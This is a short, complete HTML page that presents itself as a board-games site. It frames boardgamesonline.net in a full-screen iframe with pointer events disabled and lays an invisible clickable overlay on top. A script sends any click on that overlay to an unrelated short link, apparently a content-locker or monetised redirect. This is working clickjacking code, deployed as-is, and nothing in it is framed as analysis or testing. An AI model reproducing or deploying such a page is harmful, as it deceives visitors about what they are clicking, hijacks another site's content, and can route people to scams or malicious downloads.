<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>BOARD GAMES ONLINE</title>
<style>
  body, html {
    height: 100%;
    margin: 0;
  }
  .fullscreen-frame {
    width: 100%;
    height: 100%;
    border: none;
    pointer-events: none;
  }
  .fullscreen-overlay {
    width: 100%;
    height: 100%;
    position: absolute;
    top: 0;
    left: 0;
    background-color: transparent;
    display: flex;
    justify-content: center;
    align-items: center;
    cursor: pointer;
  }
  .fullscreen-overlay span {
    font-size: 24px;
    color: #fff;
    text-align: center;
    padding: 10px 20px;
    background-color: #00000000;
    border-radius: 5px;
    cursor: pointer;
  }
</style>
</head>
<body>
<div class="fullscreen-overlay">
  <span></span>
</div>
<iframe class="fullscreen-frame" src="https://boardgamesonline.net/"></iframe>
<script>
  document.querySelector('.fullscreen-overlay').addEventListener('click', function() {
    window.location.href = 'https://locked3.com/sl/4z892';
  });
</script>
</body>
	</html>
